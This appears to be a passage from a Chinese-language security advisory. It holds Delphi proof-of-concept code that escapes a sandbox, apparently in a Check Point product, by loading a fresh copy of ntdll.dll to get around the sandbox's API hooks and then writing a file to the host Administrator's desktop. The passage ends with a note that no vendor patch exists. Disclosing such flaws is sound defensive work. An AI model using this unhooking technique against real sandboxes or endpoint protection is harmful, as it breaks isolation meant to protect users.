function UnHook(dllname: string): boolean;
var
MapOffset: pointer;
dll, filename: string;
MapHandle, FileHandle: THandle;
Begin
dll := SystemDir + '\' + dllname;
filename := GetSpecialPath(CSIDL_APPDATA) + '\' + dllname;
result := CopyFile(PChar(dll), PChar(filename), false);
if result then
begin
FileHandle := CreateFile(pChar(filename), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);
If FileHandle <> INVALID_HANDLE_VALUE then
Try
MapHandle := CreateFileMapping(FileHandle, nil, $1000002, 0, 0, nil);
If MapHandle <> 0 then
Try
MapOffset := MapViewOfFile(MapHandle, FILE_MAP_READ, 0, 0, 0);
If MapOffset <> nil then
Try
resolve_APIs_from_dll_images(MapOffset, dllname);
Finally
UnmapViewOfFile(MapOffset);
End;
Finally
CloseHandle(MapHandle);
End;
Finally
CloseHandle(FileHandle);
End;
DeleteFile(filename);
end;
End;
procedure Write2File(filename, s: string);
var
f: textfile;
begin
assignfile(f, filename);
rewrite(f);
writeln(f, s);
closefile(f);
end;
begin
UnHook('ntdll.dll');
..
Write2File('c:\users\Administrator\Desktop\POC.txt', 'Now we writing to host OS');
end;
建议:
--------------------------------------------------------------------------------
厂商补丁:
Check Point Software
--------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: